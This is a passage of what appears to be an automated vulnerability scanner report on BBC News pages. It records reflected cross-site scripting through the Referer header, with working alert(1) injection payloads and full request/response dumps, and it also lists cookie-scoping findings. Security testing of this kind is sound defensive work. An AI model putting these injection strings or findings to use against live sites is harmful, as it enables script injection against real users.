Referer: http://www.google.com/search?hl=en&q=43865'-alert(1)-'eab3b7e3aa4

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:03:48 GMT
Keep-Alive: timeout=10, max=752
Expires: Sat, 12 Feb 2011 02:03:48 GMT
Connection: close
Set-Cookie: BBC-UID=d47db5b5ce6a68c40b29ca1ad1935f1e6ea459dec0f091a9ebdb735fab14529e0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:48 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=d47db5b5ce6a68c40b29ca1ad1935f1e6ea459dec0f091a9ebdb735fab14529e0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:48 GMT; path=/; domain=bbc.co.uk;
Content-Length: 61262

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1297476228000,
       editionToServe: 'us',
       queryString: null,
       referrer: 'http://www.google.com/search?hl=en&amp;q=43865'-alert(1)-'eab3b7e3aa4',
       section: 'middle-east',
       sectionPath: '/World/Middle East',
       siteName: 'BBC News',
       siteToServe: 'news',
       siteVersion: 'cream',
       storyId: '12437922',
       assetType: 'media_asset',
       uri
...[SNIP]...

1.96. http://www.bbc.co.uk/news/world-south-asia-12427513 [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/world-south-asia-12427513

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6bf95'-alert(1)-'08aab8b8dce was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news/world-south-asia-12427513 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=6bf95'-alert(1)-'08aab8b8dce

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:03:49 GMT
Keep-Alive: timeout=10, max=641
Expires: Sat, 12 Feb 2011 02:03:49 GMT
Connection: close
Set-Cookie: BBC-UID=243df5b52edac8951ab4888c9191115fb456b80670c061d95b0bc3ff6155d7fa0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:49 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=243df5b52edac8951ab4888c9191115fb456b80670c061d95b0bc3ff6155d7fa0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:49 GMT; path=/; domain=bbc.co.uk;
Content-Length: 58215

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1297476229000,
       editionToServe: 'us',
       queryString: null,
       referrer: 'http://www.google.com/search?hl=en&amp;q=6bf95'-alert(1)-'08aab8b8dce',
       section: 'south-asia',
       sectionPath: '/World/South Asia',
       siteName: 'BBC News',
       siteToServe: 'news',
       siteVersion: 'cream',
       storyId: '12427513',
       assetType: 'story',
       uri: '/news
...[SNIP]...

1.97. http://www.bbc.co.uk/news/world-south-asia-12427518 [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/world-south-asia-12427518

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 45004'-alert(1)-'624fcec322a was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news/world-south-asia-12427518 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=45004'-alert(1)-'624fcec322a

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:03:51 GMT
Keep-Alive: timeout=10, max=769
Expires: Sat, 12 Feb 2011 02:03:51 GMT
Connection: close
Set-Cookie: BBC-UID=448d75c5fefa58a7d7239706f1aa8862d9ad33391010014ad46b3a9564c10c7c0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:51 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=448d75c5fefa58a7d7239706f1aa8862d9ad33391010014ad46b3a9564c10c7c0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:51 GMT; path=/; domain=bbc.co.uk;
Content-Length: 61230

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1297476231000,
       editionToServe: 'us',
       queryString: null,
       referrer: 'http://www.google.com/search?hl=en&amp;q=45004'-alert(1)-'624fcec322a',
       section: 'south-asia',
       sectionPath: '/World/South Asia',
       siteName: 'BBC News',
       siteToServe: 'news',
       siteVersion: 'cream',
       storyId: '12427518',
       assetType: 'story',
       uri: '/news
...[SNIP]...

1.98. http://www.bbc.co.uk/news/world-south-asia-12437087 [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/world-south-asia-12437087

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9732a'-alert(1)-'803905a719 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news/world-south-asia-12437087 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=9732a'-alert(1)-'803905a719

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:03:51 GMT
Keep-Alive: timeout=10, max=776
Expires: Sat, 12 Feb 2011 02:03:51 GMT
Connection: close
Set-Cookie: BBC-UID=048d75755e0ad8e7fa87a749c1821076ebfcff3260c0413af47baab59d80f6b40Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:51 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=048d75755e0ad8e7fa87a749c1821076ebfcff3260c0413af47baab59d80f6b40Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:51 GMT; path=/; domain=bbc.co.uk;
Content-Length: 61389

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1297476231000,
       editionToServe: 'us',
       queryString: null,
       referrer: 'http://www.google.com/search?hl=en&amp;q=9732a'-alert(1)-'803905a719',
       section: 'south-asia',
       sectionPath: '/World/South Asia',
       siteName: 'BBC News',
       siteToServe: 'news',
       siteVersion: 'cream',
       storyId: '12437087',
       assetType: 'story',
       uri: '/news
...[SNIP]...

1.99. http://www.bbc.co.uk/news/world-us-canada-12411274 [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/world-us-canada-12411274

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1911a'-alert(1)-'aca9f8c5523 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news/world-us-canada-12411274 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=1911a'-alert(1)-'aca9f8c5523

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:03:52 GMT
Keep-Alive: timeout=10, max=629
Expires: Sat, 12 Feb 2011 02:03:52 GMT
Connection: close
Set-Cookie: BBC-UID=642df5e57e7ad808da84c92f91cd30f8669a963520901109dbcb133fa115d7ba0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:52 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=642df5e57e7ad808da84c92f91cd30f8669a963520901109dbcb133fa115d7ba0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:52 GMT; path=/; domain=bbc.co.uk;
Content-Length: 62068

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1297476232000,
       editionToServe: 'us',
       queryString: null,
       referrer: 'http://www.google.com/search?hl=en&amp;q=1911a'-alert(1)-'aca9f8c5523',
       section: 'us-and-canada',
       sectionPath: '/World/US and Canada',
       siteName: 'BBC News',
       siteToServe: 'news',
       siteVersion: 'cream',
       storyId: '12411274',
       assetType: 'story',
       uri:
...[SNIP]...

1.100. http://www.bbc.co.uk/news/world-us-canada-12435117 [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/world-us-canada-12435117

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fb6fe'-alert(1)-'ec6e2db7529 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news/world-us-canada-12435117 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=fb6fe'-alert(1)-'ec6e2db7529

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:03:53 GMT
Keep-Alive: timeout=10, max=785
Expires: Sat, 12 Feb 2011 02:03:53 GMT
Connection: close
Set-Cookie: BBC-UID=543d4505be4af809aab46757d18edd81d4b3fdc13040e1ca948beae667e467d80Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:53 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=543d4505be4af809aab46757d18edd81d4b3fdc13040e1ca948beae667e467d80Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:53 GMT; path=/; domain=bbc.co.uk;
Content-Length: 57744

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1297476233000,
       editionToServe: 'us',
       queryString: null,
       referrer: 'http://www.google.com/search?hl=en&amp;q=fb6fe'-alert(1)-'ec6e2db7529',
       section: 'us-and-canada',
       sectionPath: '/World/US and Canada',
       siteName: 'BBC News',
       siteToServe: 'news',
       siteVersion: 'cream',
       storyId: '12435117',
       assetType: 'story',
       uri:
...[SNIP]...

1.101. http://www.bbc.co.uk/news/world-us-canada-12436383 [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/world-us-canada-12436383

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 78bef'-alert(1)-'fa7f6377061 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news/world-us-canada-12436383 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=78bef'-alert(1)-'fa7f6377061

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:03:53 GMT
Keep-Alive: timeout=10, max=752
Expires: Sat, 12 Feb 2011 02:03:53 GMT
Connection: close
Set-Cookie: BBC-UID=941db5855e0a1809fade5d8581efda75d82b52d7a0c0f1e94bfb33cf1325b3b20Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:53 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=941db5855e0a1809fade5d8581efda75d82b52d7a0c0f1e94bfb33cf1325b3b20Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:53 GMT; path=/; domain=bbc.co.uk;
Content-Length: 57054

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1297476233000,
       editionToServe: 'us',
       queryString: null,
       referrer: 'http://www.google.com/search?hl=en&amp;q=78bef'-alert(1)-'fa7f6377061',
       section: 'us-and-canada',
       sectionPath: '/World/US and Canada',
       siteName: 'BBC News',
       siteToServe: 'news',
       siteVersion: 'cream',
       storyId: '12436383',
       assetType: 'story',
       uri:
...[SNIP]...

1.102. http://www.bbc.co.uk/news/world-us-canada-12437116 [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/world-us-canada-12437116

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 66024'-alert(1)-'9865873deed was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news/world-us-canada-12437116 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=66024'-alert(1)-'9865873deed

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:03:56 GMT
Keep-Alive: timeout=10, max=705
Expires: Sat, 12 Feb 2011 02:03:56 GMT
Connection: close
Set-Cookie: BBC-UID=549d15654ebad86c879359326178e5ebf75cd5ad6050b1ba74ab5a2544018ccc0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:56 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=549d15654ebad86c879359326178e5ebf75cd5ad6050b1ba74ab5a2544018ccc0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:56 GMT; path=/; domain=bbc.co.uk;
Content-Length: 69006

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1297476236000,
       editionToServe: 'us',
       queryString: null,
       referrer: 'http://www.google.com/search?hl=en&amp;q=66024'-alert(1)-'9865873deed',
       section: 'us-and-canada',
       sectionPath: '/World/US and Canada',
       siteName: 'BBC News',
       siteToServe: 'news',
       siteVersion: 'cream',
       storyId: '12437116',
       assetType: 'story',
       uri:
...[SNIP]...

1.103. http://www.bbc.co.uk/news/world-us-canada-12437121 [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/world-us-canada-12437121

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 70c89'-alert(1)-'e5af21b3e81 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news/world-us-canada-12437121 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=70c89'-alert(1)-'e5af21b3e81

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:03:54 GMT
Keep-Alive: timeout=10, max=793
Expires: Sat, 12 Feb 2011 02:03:54 GMT
Connection: close
Set-Cookie: BBC-UID=142da5957edab83a5a9eb97e5104ea6d0c1f1bc590707109bb7bc38ee02e44dc0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:54 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=142da5957edab83a5a9eb97e5104ea6d0c1f1bc590707109bb7bc38ee02e44dc0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:54 GMT; path=/; domain=bbc.co.uk;
Content-Length: 55023

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1297476234000,
       editionToServe: 'us',
       queryString: null,
       referrer: 'http://www.google.com/search?hl=en&amp;q=70c89'-alert(1)-'e5af21b3e81',
       section: 'us-and-canada',
       sectionPath: '/World/US and Canada',
       siteName: 'BBC News',
       siteToServe: 'news',
       siteVersion: 'cream',
       storyId: '12437121',
       assetType: 'story',
       uri:
...[SNIP]...

2. Cookie scoped to parent domain  previous  next
There are 94 instances of this issue:

Issue background

A cookie's domain attribute determines which domains can access the cookie. Browsers will automatically submit the cookie in requests to in-scope domains, and those domains will also be able to access the cookie via JavaScript. If a cookie is scoped to a parent domain, then that cookie will be accessible by the parent domain and also by any other subdomains of the parent domain. If the cookie contains sensitive data (such as a session token) then this data may be accessible by less trusted or less secure applications residing at those domains, leading to a security compromise.

Issue remediation

By default, cookies are scoped to the issuing domain and all subdomains. If you remove the explicit domain attribute from your Set-cookie directive, then the cookie will have this default scope, which is safe and appropriate in most situations. If you particularly need a cookie to be accessible by a parent domain, then you should thoroughly review the security of the applications residing on that domain and its subdomains, and confirm that you are willing to trust the people and systems which support those applications.


2.1. http://www.bbc.co.uk/go/rss/int/news/-/news/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /go/rss/int/news/-/news/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /go/rss/int/news/-/news/ HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Server: Apache
Content-Type: text/html; charset=iso-8859-1
Date: Sat, 12 Feb 2011 02:02:20 GMT
Location: http://www.bbc.co.uk/news/
Keep-Alive: timeout=4, max=192
Connection: close
Set-Cookie: BBC-UID=24fd65f58e0ac24cb82fc0eb51e0bc46540efbacb0c01134044f6436d3ca799a0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Wed, 11-Feb-15 02:02:20 GMT; path=/; domain=bbc.co.uk;
Content-Length: 210

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.bbc.co.uk/news/">here</a>.</p>
</bod
...[SNIP]...

2.2. http://www.bbc.co.uk/go/rss/int/news/-/news/12437486  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /go/rss/int/news/-/news/12437486

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /go/rss/int/news/-/news/12437486 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Server: Apache
Content-Type: text/html; charset=iso-8859-1
Date: Sat, 12 Feb 2011 02:02:20 GMT
Location: http://www.bbc.co.uk/news/12437486
Keep-Alive: timeout=4, max=193
Connection: close
Set-Cookie: BBC-UID=e47dd5958e2ad26c7ba702b3c1597735ae8a2ee770b041b4f4ef6916bf1e10370Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Wed, 11-Feb-15 02:02:20 GMT; path=/; domain=bbc.co.uk;
Content-Length: 218

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.bbc.co.uk/news/12437486">here</a>.</
...[SNIP]...

2.3. http://www.bbc.co.uk/go/rss/int/news/-/news/business-12427680  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /go/rss/int/news/-/news/business-12427680

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /go/rss/int/news/-/news/business-12427680 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Server: Apache
Content-Type: text/html; charset=iso-8859-1
Date: Sat, 12 Feb 2011 02:02:21 GMT
Location: http://www.bbc.co.uk/news/business-12427680
Keep-Alive: timeout=4, max=200
Connection: close
Set-Cookie: BBC-UID=d43dc5654e9ab2cd094d0e7da11d0a5e72c4ea37b0a0c1f4e48f966f20146f750Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Wed, 11-Feb-15 02:02:21 GMT; path=/; domain=bbc.co.uk;
Content-Length: 227

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.bbc.co.uk/news/business-12427680">he
...[SNIP]...

2.4. http://www.bbc.co.uk/go/rss/int/news/-/news/business-12428689  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /go/rss/int/news/-/news/business-12428689

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /go/rss/int/news/-/news/business-12428689 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Server: Apache
Content-Type: text/html; charset=iso-8859-1
Date: Sat, 12 Feb 2011 02:02:21 GMT
Location: http://www.bbc.co.uk/news/business-12428689
Keep-Alive: timeout=4, max=189
Connection: close
Set-Cookie: BBC-UID=f4fd75354e4ab2dddeaca0d501b2b6d1d23f5512b0f0e114147fa486c8e07e8a0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Wed, 11-Feb-15 02:02:21 GMT; path=/; domain=bbc.co.uk;
Content-Length: 227

